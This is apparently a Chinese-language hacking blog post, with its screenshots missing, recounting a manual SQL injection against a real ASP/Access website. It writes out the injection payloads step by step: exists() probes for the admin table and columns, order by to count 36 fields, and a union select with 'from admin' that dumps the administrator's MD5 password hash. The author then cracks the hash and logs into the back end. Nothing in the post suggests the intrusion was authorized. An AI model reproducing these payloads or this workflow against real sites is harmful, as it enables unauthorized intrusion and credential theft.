asp Access手工注入案例

呵呵，當時聽那朋友說的，他們好多人都不行，拿不下，我被嚇到了，呵呵，想著別人那麼多人都拿不下的站，我乙個小菜鳥能拿下？

但是，開啟之後發現頁面跳轉到了

看來是直接cookie驗證了，算了，這麼複雜，直接放棄了從主站直接下手的想法，看看能不能旁註吧，於是，開啟

查詢一下，不查不知道，一查我就高興了，哈哈：

這個伺服器上放了200多個**，這麼多**能全部做到安全麼？顯然，在國內來說，那是不可能的，所以，我的勝算增加了一分。

既然這麼多**，那就乙個乙個來吧，唉，像我這種菜鳥級的人物，只好幹這種體力活了… …

在這裡，我偷了懶，開啟明小子，批量掃瞄後台，這是我的一點個人習慣，在辦正事之前我習慣先找後台，嗯，雖然我是聯通，而這伺服器是電信，但速度還蠻快的，很快結果出來了，於是乙個後台乙個後台的試，結果不是過濾注入就是網域名稱失效，弱口令更是乙個沒有，繼續，繼續，繼續。

一直到這個**：

後台是：

/admin/login.asp

先看有沒有弱口令，發現沒有，於是只好去前台轉，開啟前台後，是英文，全是英文，我原本打算找個轉換按鈕的，但是發現頁面上沒有，算了，沒有就沒有吧，將就著來吧。

/productshow.asp?id=711

加單引號，出錯了：

我懶，懶得手工來，並且對於asp，我也實在沒有手工來的興趣，工具那麼好用，何必不用工具呢？

於是，拉出我一直信任有加的啊d，把注入點放進去，開始檢測：

結果啊d告訴我不能注入，咦？怎麼會這樣呢？

既然啊d不行，那就換明小子：

鬱悶了，明小子也告訴我不能注入，那，難道是我的手工判斷錯誤？還是這種注入型別工具無法檢測？

提交：/productshow.asp?id=711 andexists (select * from admin)

頁面回顯正常：

說明存在admin表，再提交：

/productshow.asp?id=711 andexists (select username from admin)

頁面回顯正常，說明存在username欄位，再提交：

/productshow.asp?id=711 andexists (select password from admin)

頁面回顯正常，說明存在password欄位，現在表名和欄位名全部猜完，該爆使用者名稱和密碼了，於是，先order by，提交：

/productshow.asp?id=711 orderby 5

頁面回顯錯誤，說明頁面中的字段數不是5，依次反覆提交，直到提交：

/productshow.asp?id=711 orderby 36

這時頁面回顯正常，說明欄位數為36，於是，開始union select，提交：

/productshow.asp?id=711 and1=2 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36

頁面回顯錯誤，為什麼會出錯呢？

當時我的理解有2點，一，是需要用null替代了，二，是需要加from了，我懶，懶得寫36個null，於是，先試試加from吧，提交：

/productshow.asp?id=711 and1=2 union select

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36from admin

頁面回顯正常，成功出現顯示位：

ok，既然顯示位出來了，那就開始爆使用者名稱和密碼吧，提交：

哦了，管理員的使用者名稱和密碼都爆出來了，把md5複製下來，去解密：

ok，結果出來了，密碼是better，開啟後台，登入：

ok，登入成功。

下邊的，俺這小菜鳥就不寫拉，這篇文章只是**一下union select的時候是否要加from，以及在什麼情況下要加from，我試了試這個站的資料庫，發現好像不是mssql，應該是access的，而在php+mysql的聯合查詢中，就不必在最後加上from，那麼是否就是說，在access環境下，就必須要加上from呢？望明人指點，謝謝。

文章很戳，沒什麼技術含量，不要噴我不要噴我……

asp Access手工注入案例

手工注入 MySQL手工注入實戰和分析

PHP手工注入

SQL手工注入

asp Access手工注入案例

手工注入 MySQL手工注入實戰和分析

PHP手工注入

SQL手工注入

相關推薦